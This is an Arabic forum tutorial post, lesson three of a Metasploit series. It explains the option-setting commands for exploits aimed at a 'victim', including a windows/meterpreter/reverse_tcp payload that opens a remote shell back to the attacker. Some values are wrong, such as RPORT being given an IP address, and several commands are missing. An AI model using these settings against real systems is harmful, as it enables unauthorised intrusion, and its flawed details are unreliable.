بسم الله الرحم الرحيم
السلام عليكم ورحمة الله وبركاتة
اليوم درسنا الدرس الثالث ان شاء الله رح يكون عن ادخال معلومات الهدف في خيارات الثغرة لأستغلالها بالشكل الصحيح
نبدأ على طول على بركة الله .. للعلم هذا الدرس اساسي في اعتمادك على الاختراق وهو يعتمد في عملية الاستهداف على 99% اذا لم يكن 100%
اول امر وهو
تطرقنا له في الدرس الثاني .. لأظهار خيارات الثغرة show options وهذا الامر موضح بالدرس السابق ..وبهذا الامر تستطيع معرفة ماذا ستستعملانظر تحت v_v
نشوف الآن كيف يكون الامر
كود PHP:
set LHOST 192.168.1.151
يستخدم لادخال اي بي جهازنا ضمن خيارات الثغرة لتصنت عن طريقة او وصول تبليغ
كود PHP:
set RHOST 192.168.5.110
يستخدم هذا ايضا لادخال اي بي جهاز الضحية يعني باختصار ي بي الهدف
ادخال البورت الذي ستستخدمه في التصنت ولك الحق بوضع اي رقم بورت تريده وهذا يستخجم في حال انت تستخدم بايلود اتصال عكسي او ثغرة اتصال عكسي reverse
كود PHP:
set RPORT 192.168.5.151
لأدخال بورت الهدف بتاع الضحية الى خيارات الثغرة ويستخدم هذا في حال الاتصال المباشر bind
###
كود PHP:
set PAYLOAD windows/meterpreter/reverse_tcp
يستخدم لتحديد البايلود الذي نريد استخدامه في عملية الاختراق وان شاء الله رح يكون درس كامل عن هذه البايلود لخطورتها وسهولة استعمالها وقوتها
هنا لتحديد المسار انا وضعت vb لمثال وانما في بعض تطلب مسارات اخرى لكن اللي يهمني هو الدال عليه وهو PATH وهو المسار المراد استخدام بشكل عام بأي ثغرة سواء كان تحديد مسار سكربت او تحديد ملف لأستعماله في الاختراق سواء سيرفر او غيره
كود PHP:
set VHOST host.com
هنا لتحديد رابط الاستضافة في حال كنا نستهدف موقع نادرا ما تلاقي هذا الخيار
يستخدم لأدخال البورت في حال استخدام احد ثغرات المتصفح .. وهذا الخيار لا ياتي الا في ثغرات المتصفح browser هذا على حسب استعمالي اني لم اجدها في اي ثغرات اخرى غير ثغرات المتصفح وفي هذه الحالة فيك تضع 80 او 8080 او اي بورت غيره
ويلزم يكون البورت الذي تريد وضعه يكون مفتوح عندك ويفضل وضع 80 لانه للمتصف http وانت الان تتصفح انظر فوق اول رابط الموقع مكتوب http وهو بورت 80 اذا اكيد يكون مفتوح تلقائي يعني ما بتشوفه مفتوح بالرواتر هذا على حسب استنباطي
كود PHP:
set SRVHOST 0.0.0.0
يسخدم ايضا هذا الخيار فقط تلقاه في ثغرات المتصفح هذا تضع به الاي بي جهازك.. واذا تركته مثل ما هو SRVHOST 0.0.0.0 رح يتم الاستغلال تلقائي يعني وضع اي بي جهازك تلقائي فيفضل ان لا تعدل عليه لانه رح يتم تلقائي وضع اي بي جهازك يعني رح تشوفه في خيارات الثغرة هكذا 0.0.0.0
كود PHP:
set URIPATH arhacker.html
يستخدم هذا الامر لوضع رابط وايضا هذا يستخدم في ثغرات المتصفح يعني يمكن ما تلاقيه بثغرات اخرى << لست متذكر اني لم اجده في ثغرات اخرى
الى هنا ينتهي الدرس بحمد الله
اي استفسار ضعه هنا وان شاء الله يتم الرد واذا لم اكن موجود فألاعضاء ما يقصرون معك بأذن الله
ان شاء الله الدرس الرابع رح اتطرق لانواع البايلود واهميتها ووظيفتها
####
تحياتي
لا للاحتكار
المجهوول
19/03/2010, 12:02
(أظهر الكل)
الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 73
ادخال معلومات الهدف الى خيارات الثغرة(مهم)
العرض العادي
